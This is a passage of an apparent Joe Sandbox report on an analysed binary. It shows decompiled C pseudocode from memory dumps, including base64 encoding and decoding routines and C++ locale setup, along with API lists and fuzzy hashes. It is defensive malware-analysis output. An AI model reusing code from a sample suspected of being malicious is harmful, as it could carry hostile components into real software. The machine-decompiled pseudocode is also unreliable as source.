                          						_v22 = (_t126 << 6) + _v17;
                          						_v23 = (_t126 >> 0x00000002 & 0x0000000f) + (_t67 << 4);
                          						if(_t139 == 0) {
                          							goto L35;
                          						} else {
                          							_t93 = _v32;
                          							do {
                          								E012FC280(_t93, _t93, _t139, _t146,  *(_t150 + _t146 - 0x14) & 0x000000ff);
                          								_t146 = _t146 + 1;
                          							} while (_t146 < _t139);
                          							 *[fs:0x0] = _v16;
                          							return _t93;
                          						}
                          					}
                          				}
                          			}

                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E01310430(intOrPtr __ecx, signed char __edx, intOrPtr _a4, signed char _a7) {
                          				char _v8;
                          				char _v16;
                          				signed char _v17;
                          				void* _v18;
                          				intOrPtr _v20;
                          				intOrPtr _v21;
                          				unsigned char _v22;
                          				void* _v23;
                          				signed char _v24;
                          				signed char _v25;
                          				signed char _v26;
                          				signed char _v27;
                          				unsigned char _v28;
                          				char _v29;
                          				char _v32;
                          				signed char _v36;
                          				intOrPtr _v40;
                          				signed char _v48;
                          				intOrPtr _v52;
                          				intOrPtr _v64;
                          				char _v72;
                          				signed char _v88;
                          				signed char _v92;
                          				char _v96;
                          				signed char _v100;
                          				signed char _v108;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t104;
                          				intOrPtr _t110;
                          				signed char _t117;
                          				signed int _t124;
                          				signed char _t127;
                          				signed char _t128;
                          				intOrPtr _t129;
                          				signed int _t130;
                          				signed int _t131;
                          				signed char _t132;
                          				signed char _t138;
                          				void* _t141;
                          				signed char _t142;
                          				char _t143;
                          				signed int _t144;
                          				signed int _t145;
                          				signed char _t146;
                          				intOrPtr _t152;
                          				signed char _t156;
                          				unsigned char _t159;
                          				intOrPtr _t164;
                          				void* _t166;
                          				void* _t168;
                          				signed char _t169;
                          				void* _t172;
                          				signed char _t173;
                          				signed char _t175;
                          				signed char _t180;
                          				signed char _t185;
                          				intOrPtr _t191;
                          				intOrPtr _t195;
                          				intOrPtr _t196;
                          				intOrPtr _t207;
                          				signed char _t216;
                          				signed char _t218;
                          				unsigned char _t228;
                          				unsigned char _t234;
                          				unsigned char _t241;
                          				intOrPtr _t244;
                          				intOrPtr _t246;
                          				void* _t248;
                          				void* _t249;
                          				void* _t252;
                          				intOrPtr _t254;
                          				signed char _t256;
                          				intOrPtr _t257;
                          				void* _t259;
                          				void* _t261;
                          				void* _t262;
                          				void* _t263;
                          				signed int _t264;
                          				signed int _t265;
                          				void* _t266;
                          				signed int _t267;
                          				void* _t268;
                          				void* _t277;
                          
                          				_t227 = __edx;
                          				_push(0xffffffff);
                          				_push(0x136780e);
                          				_push( *[fs:0x0]);
                          				_t267 = _t266 - 0x18;
                          				_t104 =  *0x13a4018; // 0x39cca9f6
                          				_push(_t104 ^ _t264);
                          				 *[fs:0x0] =  &_v16;
                          				_t244 = __ecx;
                          				_v40 = __ecx;
                          				_v32 = 0;
                          				 *((intOrPtr*)(__ecx + 0x10)) = 0;
                          				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
                          				 *((char*)(__ecx)) = 0;
                          				_v8 = 0;
                          				_t254 = 0;
                          				_t164 = _a4;
                          				_v32 = 1;
                          				if(_t164 == 0) {
                          					L20:
                          					 *[fs:0x0] = _v16;
                          					return _t244;
                          				} else {
                          					do {
                          						_t164 = _t164 - 1;
                          						 *((char*)(_t264 + _t254 - 0x14)) =  *_t227;
                          						_t227 = _t227 + 1;
                          						_t254 = _t254 + 1;
                          						_t180 = _v24;
                          						_v36 = _t227;
                          						_v18 = _v22;
                          						_a7 = _t180;
                          						_v17 = _t180;
                          						if(_t254 == 3) {
                          							_t216 = _t180 & 0x00000003;
                          							_v28 = _t180 >> 2;
                          							_t156 = _t216 >> 4;
                          							_t218 = (_t216 << 4) + _t156;
                          							_v27 = _t218;
                          							_t159 = (_t156 & 0x0000003f) >> 6;
                          							_v25 = _t159;
                          							_t263 = 0;
                          							_v26 = ((_t218 & 0x0000000f) << 2) + _t159;
                          							asm("o16 nop [eax+eax]");
                          							do {
                          								_t224 =  >=  ?  *0x13a609c : 0x13a609c;
                          								E012FC280(_t164, _t244, _t244, _t263,  *(( *(_t264 + _t263 - 0x18) & 0x000000ff) + ( >=  ?  *0x13a609c : 0x13a609c)) & 0x000000ff);
                          								_t263 = _t263 + 1;
                          							} while (_t263 < 4);
                          							_t227 = _v36;
                          							_t254 = 0;
                          							_t180 = _v17;
                          						}
                          					} while (_t164 != 0);
                          					_a4 = _t254;
                          					if(_t254 == 0) {
                          						goto L20;
                          					} else {
                          						_t110 = _t254;
                          						if(_t254 >= 3) {
                          							_t228 = _v18;
                          							goto L13;
                          						} else {
                          							_t277 = _t110 - 3;
                          							while(_t277 < 0) {
                          								 *((char*)(_t264 + _t110 - 0x14)) = 0;
                          								_t110 = _t110 + 1;
                          								if(_t110 < 3) {
                          									continue;
                          								} else {
                          									_t228 = _v22;
                          									_t180 = _v24;
                          									L13:
                          									_t166 = 0;
                          									_v28 = _t180 >> 2;
                          									_t185 = ((_t180 & 3) << 4) + ((_t180 & 0x00000003) >> 4) << 2;
                          									_v27 = _t185;
                          									_v25 = _t228 & 0x0000003f;
                          									_t38 = _t254 + 1; // 0x2
                          									_t117 = _t38;
                          									_v26 = _t185 + (_t228 >> 6);
                          									_v36 = _t117;
                          									if(_t117 > 0) {
                          										_t256 = _t117;
                          										do {
                          											_t189 =  >=  ?  *0x13a609c : 0x13a609c;
                          											E012FC280(_t166, _t244, _t244, _t256,  *(( *(_t264 + _t166 - 0x18) & 0x000000ff) + ( >=  ?  *0x13a609c : 0x13a609c)) & 0x000000ff);
                          											_t166 = _t166 + 1;
                          										} while (_t166 < _t256);
                          										_t254 = _a4;
                          									}
                          									if(_t254 < 3) {
                          										_t168 = 3 - _t254;
                          										do {
                          											E012FC280(_t168, _t244, _t244, _t254, 0x3d);
                          											_t168 = _t168 - 1;
                          										} while (_t168 != 0);
                          									}
                          									goto L20;
                          								}
                          								goto L59;
                          							}
                          							E0132EC0C();
                          							asm("int3");
                          							asm("int3");
                          							asm("int3");
                          							asm("int3");
                          							asm("int3");
                          							asm("int3");
                          							asm("int3");
                          							asm("int3");
                          							asm("int3");
                          							_push(_t264);
                          							_t265 = _t267;
                          							_push(0xffffffff);
                          							_push(0x136586e);
                          							_push( *[fs:0x0]);
                          							_t268 = _t267 - 0x24;
                          							_push(_t164);
                          							_push(_t254);
                          							_push(_t244);
                          							_t124 =  *0x13a4018; // 0x39cca9f6
                          							_push(_t124 ^ _t265);
                          							 *[fs:0x0] =  &_v72;
                          							_t169 = _t227;
                          							_v100 = _t169;
                          							_t127 = _t180;
                          							_v88 = _t127;
                          							_v92 = _t127;
                          							_v108 = _t127;
                          							_t257 = 0;
                          							_v96 = 0;
                          							_t246 = 0;
                          							_t191 =  *((intOrPtr*)(_t169 + 0x10));
                          							 *((intOrPtr*)(_t127 + 0x10)) = 0;
                          							 *((intOrPtr*)(_t127 + 0x14)) = 0xf;
                          							 *_t127 = 0;
                          							_v64 = 0;
                          							_v96 = 1;
                          							if(_t191 == 0) {
                          								L58:
                          								 *[fs:0x0] = _v20;
                          								return _t127;
                          							} else {
                          								while(1) {
                          									_t128 = _t169;
                          									_v40 = _t191 - 1;
                          									_t195 =  *((intOrPtr*)(_t169 + 0x14));
                          									if(_t195 >= 0x10) {
                          										_t128 =  *_t169;
                          									}
                          									if( *((char*)(_t128 + _t246)) == 0x3d) {
                          										break;
                          									}
                          									_t138 = _t169;
                          									if(_t195 >= 0x10) {
                          										_t138 =  *_t169;
                          									}
                          									_v29 =  *(_t138 + _t246);
                          									_t141 = E01349C70(_t169, _t195, _t227,  *(_t138 + _t246) & 0x000000ff);
                          									_t268 = _t268 + 4;
                          									if(_t141 != 0) {
                          										L31:
                          										_t142 = _t169;
                          										if( *((intOrPtr*)(_t169 + 0x14)) >= 0x10) {
                          											_t142 =  *_t169;
                          										}
                          										_t143 =  *((intOrPtr*)(_t142 + _t246));
                          										_t246 = _t246 + 1;
                          										 *((char*)(_t265 + _t257 - 0x10)) = _t143;
                          										_t257 = _t257 + 1;
                          										_v52 = _t246;
                          										if(_t257 == 4) {
                          											_t207 =  *0x13a60ac; // 0x0
                          											_t261 = 0;
                          											do {
                          												_t144 =  *(_t265 + _t261 - 0x10);
                          												_t252 =  >=  ?  *0x13a609c : 0x13a609c;
                          												if(_t207 == 0) {
                          													L38:
                          													_t145 = _t144 | 0xffffffff;
                          												} else {
                          													_t144 = E01347A30(0x13a609c, _t144, _t207);
                          													_t268 = _t268 + 0xc;
                          													if(_t144 == 0) {
                          														goto L38;
                          													} else {
                          														_t145 = _t144 - 0x13a609c;
                          													}
                          												}
                          												_t207 =  *0x13a60ac; // 0x0
                          												 *(_t265 + _t261 - 0x10) = _t145;
                          												_t261 = _t261 + 1;
                          											} while (_t261 < 4);
                          											_t146 = _v24;
                          											_t175 = _v36;
                          											_v28 = (_t146 >> 0x00000004 & 0x00000003) + (_t146 << 2);
                          											_t241 = _v22;
                          											_t227 = (_t241 << 6) + _v21;
                          											_v26 = (_t241 << 6) + _v21;
                          											_t262 = 0;
                          											_v27 = (_t241 >> 0x00000002 & 0x0000000f) + (_t146 << 4);
                          											do {
                          												E012FC280(_t175, _t175, _t252, _t262,  *(_t265 + _t262 - 0x14) & 0x000000ff);
                          												_t262 = _t262 + 1;
                          											} while (_t262 < 3);
                          											_t169 = _v48;
                          											_t257 = 0;
                          											_t246 = _v52;
                          										}
                          										_t191 = _v40;
                          										if(_t191 != 0) {
                          											continue;
                          										}
                          									} else {
                          										_t152 = _v29;
                          										if(_t152 == 0x2b || _t152 == 0x2f) {
                          											goto L31;
                          										}
                          									}
                          									break;
                          								}
                          								if(_t257 == 0) {
                          									L57:
                          									_t127 = _v36;
                          									goto L58;
                          								} else {
                          									_t129 = _t257;
                          									if(_t257 < 4) {
                          										do {
                          											 *((char*)(_t265 + _t129 - 0x10)) = 0;
                          											_t129 = _t129 + 1;
                          										} while (_t129 < 4);
                          									}
                          									_t196 =  *0x13a60ac; // 0x0
                          									_t248 = 0;
                          									do {
                          										_t130 =  *(_t265 + _t248 - 0x10);
                          										_t172 =  >=  ?  *0x13a609c : 0x13a609c;
                          										if(_t196 == 0) {
                          											L51:
                          											_t131 = _t130 | 0xffffffff;
                          										} else {
                          											_t130 = E01347A30(0x13a609c, _t130, _t196);
                          											_t268 = _t268 + 0xc;
                          											if(_t130 == 0) {
                          												goto L51;
                          											} else {
                          												_t131 = _t130 - _t172;
                          											}
                          										}
                          										_t196 =  *0x13a60ac; // 0x0
                          										 *(_t265 + _t248 - 0x10) = _t131;
                          										_t248 = _t248 + 1;
                          									} while (_t248 < 4);
                          									_t132 = _v24;
                          									_t91 = _t257 - 1; // -1
                          									_t249 = _t91;
                          									_v28 = (_t132 >> 0x00000004 & 0x00000003) + (_t132 << 2);
                          									_t259 = 0;
                          									_t234 = _v22;
                          									_v26 = (_t234 << 6) + _v21;
                          									_v27 = (_t234 >> 0x00000002 & 0x0000000f) + (_t132 << 4);
                          									if(_t249 == 0) {
                          										goto L57;
                          									} else {
                          										_t173 = _v36;
                          										do {
                          											E012FC280(_t173, _t173, _t249, _t259,  *(_t265 + _t259 - 0x14) & 0x000000ff);
                          											_t259 = _t259 + 1;
                          										} while (_t259 < _t249);
                          										 *[fs:0x0] = _v20;
                          										return _t173;
                          									}
                          								}
                          							}
                          						}
                          					}
                          				}
                          				L59:
                          			}

                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e643feef67ff9d62030ca718be8f28d8b06f49a201123bdd244a7e09c79412f7
                          • Instruction ID: 66781c6cae75d80287b81111c11462eacdac84bdc4d886daac89dffe8cf48b14
                          • Opcode Fuzzy Hash: e643feef67ff9d62030ca718be8f28d8b06f49a201123bdd244a7e09c79412f7
                          • Instruction Fuzzy Hash: 55512576D0819A8FEB168FA880617FFFFB8EB16304F0501ADD9949B383C6648645C7E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                          • Instruction ID: bf0735df39a8280c8f81db1da3be7fda03d986f5a57243ee0adccbcf9051d48c
                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                          • Instruction Fuzzy Hash: 0C11EB7724018247F614CABDD8B85B6BFD5EBC522972D837AD2418B754D322F3459600
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f7d0e582e92355af6a241f80d7c67032be0aa087ad7d929074014bd9431085a3
                          • Instruction ID: aeb07f8703162b109c655adbeafed4b324b66cbc6605a158ea0be169c0f503d1
                          • Opcode Fuzzy Hash: f7d0e582e92355af6a241f80d7c67032be0aa087ad7d929074014bd9431085a3
                          • Instruction Fuzzy Hash: 57F0A972A50220EFCF22CA4CC406E8CB3ACEB04B28F91049AE901EB245C6B0DE00C7C0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 84adcf6e336c4bae0f721f8d2f7d32daac37cdaf3c253ded2eee1c659e4a4c20
                          • Instruction ID: 5218c73ce04673d435299f88e911270f10bc22bbce990f2c809417d84baf21e2
                          • Opcode Fuzzy Hash: 84adcf6e336c4bae0f721f8d2f7d32daac37cdaf3c253ded2eee1c659e4a4c20
                          • Instruction Fuzzy Hash: E8E08C72911268EBCB94DB8CCA04D8AF7ECEB44E18B51059ABA01D3200C270DE01C7E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 48%
                          			E01318329(void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                          				intOrPtr _v0;
                          				intOrPtr _v8;
                          				signed int _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				void* _v24;
                          				char _v28;
                          				intOrPtr _v32;
                          				intOrPtr* _v48;
                          				char _v64;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				intOrPtr _t88;
                          				void* _t147;
                          				intOrPtr _t174;
                          				intOrPtr _t175;
                          				intOrPtr* _t185;
                          				intOrPtr* _t186;
                          				intOrPtr* _t189;
                          				intOrPtr* _t192;
                          				intOrPtr _t193;
                          				intOrPtr* _t223;
                          				void* _t244;
                          				intOrPtr _t245;
                          				void* _t247;
                          				intOrPtr* _t248;
                          				intOrPtr* _t249;
                          				intOrPtr* _t250;
                          				intOrPtr* _t251;
                          				intOrPtr* _t252;
                          				intOrPtr _t255;
                          				intOrPtr _t256;
                          				void* _t260;
                          				intOrPtr* _t262;
                          				intOrPtr* _t263;
                          				intOrPtr* _t264;
                          				intOrPtr* _t265;
                          				void* _t266;
                          				void* _t279;
                          				void* _t280;
                          				void* _t285;
                          
                          				_t279 = _t285;
                          				_t189 = _a4;
                          				_t244 = _t189 + 1;
                          				do {
                          					_t88 =  *_t189;
                          					_t189 = _t189 + 1;
                          				} while (_t88 != 0);
                          				_push(1);
                          				_t247 = _t189 - _t244 + 1;
                          				_t260 = E0134B4B6();
                          				_t192 = _t247;
                          				if(_t260 == 0) {
                          					E01316BCF(__eflags);
                          					asm("int3");
                          					_push(_t279);
                          					_t280 = _t285;
                          					_t245 = _v8;
                          					_push(_t260);
                          					_t185 = _t192;
                          					_push(_t247);
                          					_t193 =  *((intOrPtr*)(_t185 + 0x10));
                          					_v20 = _t193;
                          					__eflags = 0x7fffffff - _t193 - _t245;
                          					if(__eflags < 0) {
                          						E012F4B30(_t193, __eflags);
                          						asm("int3");
                          						_push(8);
                          						E0132F1B6(0x1368615, __eflags);
                          						E013177B6( &_v28, 0);
                          						_t262 =  *0x13aa8d8; // 0x0
                          						_v12 = _v12 & 0x00000000;
                          						_v24 = _t262;
                          						_t248 = E012F9A10(_v0, E012F9850(0x13aa8c4));
                          						__eflags = _t248;
                          						if(_t248 != 0) {
                          							L17:
                          							E0131780E( &_v28);
                          							return E0132F190(_t248, __eflags);
                          						} else {
                          							__eflags = _t262;
                          							if(__eflags == 0) {
                          								_push(_v0);
                          								_push( &_v24);
                          								__eflags = E01318C0E(_t262, __eflags) - 0xffffffff;
                          								if(__eflags == 0) {
                          									E012F9060();
                          									asm("int3");
                          									_push(8);
                          									E0132F1B6(0x1368615, __eflags);
                          									E013177B6( &_v28, 0);
                          									_t263 =  *0x13aa8c8; // 0x0
                          									_v12 = _v12 & 0x00000000;
                          									_v24 = _t263;
                          									_t249 = E012F9A10(_v0, E012F9850(0x13aa890));
                          									__eflags = _t249;
                          									if(_t249 != 0) {
                          										L24:
                          										E0131780E( &_v28);
                          										return E0132F190(_t249, __eflags);
                          									} else {
                          										__eflags = _t263;
                          										if(__eflags == 0) {
                          											_push(_v0);
                          											_push( &_v24);
                          											__eflags = E01318C76(__eflags) - 0xffffffff;
                          											if(__eflags == 0) {
                          												E012F9060();
                          												asm("int3");
                          												_push(8);
                          												E0132F1B6(0x1368615, __eflags);
                          												E013177B6( &_v28, 0);
                          												_t264 =  *0x13aa8cc; // 0x0
                          												_v12 = _v12 & 0x00000000;
                          												_v24 = _t264;
                          												_t250 = E012F9A10(_v0, E012F9850(0x13aa8b8));
                          												__eflags = _t250;
                          												if(_t250 != 0) {
                          													L31:
                          													E0131780E( &_v28);
                          													return E0132F190(_t250, __eflags);
                          												} else {
                          													__eflags = _t264;
                          													if(__eflags == 0) {
                          														_push(_v0);
                          														_push( &_v24);
                          														__eflags = E01318CDC(_t264, __eflags) - 0xffffffff;
                          														if(__eflags == 0) {
                          															E012F9060();
                          															asm("int3");
                          															_push(8);
                          															E0132F1B6(0x1368615, __eflags);
                          															E013177B6( &_v28, 0);
                          															_t265 =  *0x13aa8d0; // 0x0
                          															_v12 = _v12 & 0x00000000;
                          															_v24 = _t265;
                          															_t251 = E012F9A10(_v0, E012F9850(0x13aa8bc));
                          															__eflags = _t251;
                          															if(_t251 != 0) {
                          																L38:
                          																E0131780E( &_v28);
                          																return E0132F190(_t251, __eflags);
                          															} else {
                          																__eflags = _t265;
                          																if(__eflags == 0) {
                          																	_push(_v0);
                          																	_push( &_v24);
                          																	__eflags = E01318D44(_t265, __eflags) - 0xffffffff;
                          																	if(__eflags == 0) {
                          																		E012F9060();
                          																		asm("int3");
                          																		_push(8);
                          																		E0132F1B6(0x1368615, __eflags);
                          																		E013177B6( &_v28, 0);
                          																		_t266 =  *0x13aa8d4; // 0x0
                          																		_v12 = _v12 & 0x00000000;
                          																		_v24 = _t266;
                          																		_t252 = E012F9A10(_v0, E012F9850(0x13aa8c0));
                          																		__eflags = _t252;
                          																		if(_t252 != 0) {
                          																			L45:
                          																			E0131780E( &_v28);
                          																			return E0132F190(_t252, __eflags);
                          																		} else {
                          																			__eflags = _t266;
                          																			if(__eflags == 0) {
                          																				_push(_v0);
                          																				_push( &_v24);
                          																				_t147 = E01318DAC(_t266, __eflags, __fp0);
                          																				_pop(_t223);
                          																				__eflags = _t147 - 0xffffffff;
                          																				if(__eflags == 0) {
                          																					E012F9060();
                          																					asm("int3");
                          																					_push(_t280);
                          																					_push(_t185);
                          																					_t186 = _t223;
                          																					_push(_t266);
                          																					_push(_t252);
                          																					_v48 = _t186;
                          																					 *((intOrPtr*)(_t186 + 4)) = _v32;
                          																					 *_t186 = 0x1375270;
                          																					E01317C11(_t252, _t266, __eflags, __fp0,  &_v64);
                          																					asm("movsd");
                          																					asm("movsd");
                          																					asm("movsd");
                          																					asm("movsd");
                          																					return _t186;
                          																				} else {
                          																					_t252 = _v24;
                          																					_v24 = _t252;
                          																					_v12 = 1;
                          																					E0131792B(__eflags, _t252);
                          																					 *0x1374358();
                          																					 *((intOrPtr*)( *((intOrPtr*)( *_t252 + 4))))();
                          																					 *0x13aa8d4 = _t252;
                          																					goto L45;
                          																				}
                          																			} else {
                          																				_t252 = _t266;
                          																				goto L45;
                          																			}
                          																		}
                          																	} else {
                          																		_t251 = _v24;
                          																		_v24 = _t251;
                          																		_v12 = 1;
                          																		E0131792B(__eflags, _t251);
                          																		 *0x1374358();
                          																		 *((intOrPtr*)( *((intOrPtr*)( *_t251 + 4))))();
                          																		 *0x13aa8d0 = _t251;
                          																		goto L38;
                          																	}
                          																} else {
                          																	_t251 = _t265;
                          																	goto L38;
                          																}
                          															}
                          														} else {
                          															_t250 = _v24;
                          															_v24 = _t250;
                          															_v12 = 1;
                          															E0131792B(__eflags, _t250);
                          															 *0x1374358();
                          															 *((intOrPtr*)( *((intOrPtr*)( *_t250 + 4))))();
                          															 *0x13aa8cc = _t250;
                          															goto L31;
                          														}
                          													} else {
                          														_t250 = _t264;
                          														goto L31;
                          													}
                          												}
                          											} else {
                          												_t249 = _v24;
                          												_v24 = _t249;
                          												_v12 = 1;
                          												E0131792B(__eflags, _t249);
                          												 *0x1374358();
                          												 *((intOrPtr*)( *((intOrPtr*)( *_t249 + 4))))();
                          												 *0x13aa8c8 = _t249;
                          												goto L24;
                          											}
                          										} else {
                          											_t249 = _t263;
                          											goto L24;
                          										}
                          									}
                          								} else {
                          									_t248 = _v24;
                          									_v24 = _t248;
                          									_v12 = 1;
                          									E0131792B(__eflags, _t248);
                          									 *0x1374358();
                          									 *((intOrPtr*)( *((intOrPtr*)( *_t248 + 4))))();
                          									 *0x13aa8d8 = _t248;
                          									goto L17;
                          								}
                          							} else {
                          								_t248 = _t262;
                          								goto L17;
                          							}
                          						}
                          					} else {
                          						_t255 = _t193 + _t245;
                          						_v16 =  *((intOrPtr*)(_t185 + 0x14));
                          						_t174 = E012F8B30(_t255,  *((intOrPtr*)(_t185 + 0x14)), 0x7fffffff);
                          						_t11 = _t174 + 1; // 0x1
                          						_t175 = E012F57D0(_t185, _t245, _t255, _t11);
                          						 *((intOrPtr*)(_t185 + 0x10)) = _t255;
                          						_t256 = _v16;
                          						_v20 = _t175;
                          						 *((intOrPtr*)(_t185 + 0x14)) = _t174;
                          						_push(_a16);
                          						_push(_a12);
                          						_push(_a8);
                          						_push(_v12);
                          						__eflags = _t256 - 0x10;
                          						if(_t256 < 0x10) {
                          							_push(_t185);
                          							_push(_t175);
                          							E01318778();
                          						} else {
                          							_push( *_t185);
                          							_push(_t175);
                          							E01318778();
                          							_push(_t256 + 1);
                          							E012F56A0(_t185, _t256,  *_t185);
                          						}
                          						 *_t185 = _v20;
                          						return _t185;
                          					}
                          				} else {
                          					if(_t247 != 0) {
                          						E01345ED0(_t260, _a4, _t247);
                          					}
                          					return _t260;
                          				}
                          			}


                          APIs
                          • Concurrency::cancel_current_task.LIBCPMT ref: 01318367
                          • std::_Lockit::_Lockit.LIBCPMT ref: 01318410
                          • codecvt.LIBCPMT ref: 0131844A
                          • std::_Facet_Register.LIBCPMT ref: 01318461
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 01318481
                          • Concurrency::cancel_current_task.LIBCPMT ref: 0131848E
                          • std::_Lockit::_Lockit.LIBCPMT ref: 013184A5
                          • ctype.LIBCPMT ref: 013184DF
                            • Part of subcall function 01318C76: ctype.LIBCPMT ref: 01318CBD
                          • std::_Facet_Register.LIBCPMT ref: 013184F6
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 01318516
                          • Concurrency::cancel_current_task.LIBCPMT ref: 01318523
                          • std::_Lockit::_Lockit.LIBCPMT ref: 0131853A
                          • std::_Facet_Register.LIBCPMT ref: 0131858B
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 013185AB
                          • Concurrency::cancel_current_task.LIBCPMT ref: 013185B8
                          • std::_Lockit::_Lockit.LIBCPMT ref: 013185CF
                          • std::_Facet_Register.LIBCPMT ref: 01318620
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 01318640
                          • Concurrency::cancel_current_task.LIBCPMT ref: 0131864D
                          • std::_Lockit::_Lockit.LIBCPMT ref: 01318664
                          • numpunct.LIBCPMT ref: 0131869E
                          • std::_Facet_Register.LIBCPMT ref: 013186B5
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 013186D5
                          • Concurrency::cancel_current_task.LIBCPMT ref: 013186E2
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: std::_$Lockit$Concurrency::cancel_current_task$Facet_Lockit::_Lockit::~_Register$ctype$codecvtnumpunct
                          • String ID:
                          • API String ID: 796120328-0
                          • Opcode ID: 32835ac40927b8e4aae635207e403dbbcb9c5341d5d6d1eb13e58d03db48303e
                          • Instruction ID: f877abfb08ec9ec21ff0418f53a69d7650dadb148334b6899a4385d88b30f47c
                          • Opcode Fuzzy Hash: 32835ac40927b8e4aae635207e403dbbcb9c5341d5d6d1eb13e58d03db48303e
                          • Instruction Fuzzy Hash: C6B11A369002169FCF19EF68D844ABEBBB9FF94728F24054CEA14A7384DF349905CB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 73%
                          			E0132C87B(void* __ecx, void* __edx, void* __esi, void* __eflags, void* __fp0) {
                          				signed int _t65;
                          				signed char _t66;
                          				void* _t71;
                          				intOrPtr _t73;
                          				intOrPtr* _t74;
                          				void* _t82;
                          				void* _t85;
                          				void* _t88;
                          				intOrPtr* _t91;
                          				intOrPtr* _t94;
                          				intOrPtr* _t108;
                          				intOrPtr _t110;
                          				signed int _t116;
                          				void* _t117;
                          				signed int _t150;
                          				intOrPtr _t151;
                          				void* _t153;
                          				intOrPtr* _t155;
                          				void* _t156;
                          				intOrPtr* _t161;
                          				intOrPtr* _t162;
                          				void* _t163;
                          				intOrPtr* _t165;
                          				void* _t166;
                          				void* _t167;
                          				void* _t175;
                          				void* _t176;
                          				void* _t177;
                          
                          				_t195 = __fp0;
                          				_push(8);
                          				E0132F1B6(0x1369726, __eflags);
                          				_push(0);
                          				_push(0);
                          				_t65 = E0132B5B7(__edx, __esi, __eflags, __fp0);
                          				_t116 =  *(_t166 + 0x14);
                          				_t151 =  *((intOrPtr*)(_t166 + 0x10));
                          				_t150 = 1 << _t65 >> 1;
                          				if(( *(_t166 + 0xc) & 1) != 0) {
                          					_t110 = E012F9850(0x13aaa80);
                          					_t180 = _t116;
                          					if(_t116 != 0) {
                          						_push(_t116);
                          						E0131A373(__eflags, _t151, E0132B008(_t150, __eflags, __fp0), _t110);
                          						_t167 = _t167 + 0x10;
                          					} else {
                          						 *((intOrPtr*)(_t166 - 0x10)) = _t110;
                          						_t165 = E0132EA8A(__esi, _t180, 0x10);
                          						 *((intOrPtr*)(_t166 - 0x14)) = _t165;
                          						_t181 = _t165;
                          						if(_t165 == 0) {
                          							_t165 = 0;
                          							__eflags = 0;
                          						} else {
                          							 *(_t165 + 4) =  *(_t165 + 4) & _t116;
                          							 *_t165 = 0x1376b54;
                          							 *((intOrPtr*)(_t165 + 8)) = E01317D7A(_t150, _t181, __fp0);
                          							 *(_t165 + 0xc) = _t150;
                          						}
                          						E0131A373(_t181, _t151, _t165,  *((intOrPtr*)(_t166 - 0x10)));
                          						_t167 = _t167 + 0xc;
                          					}
                          				}
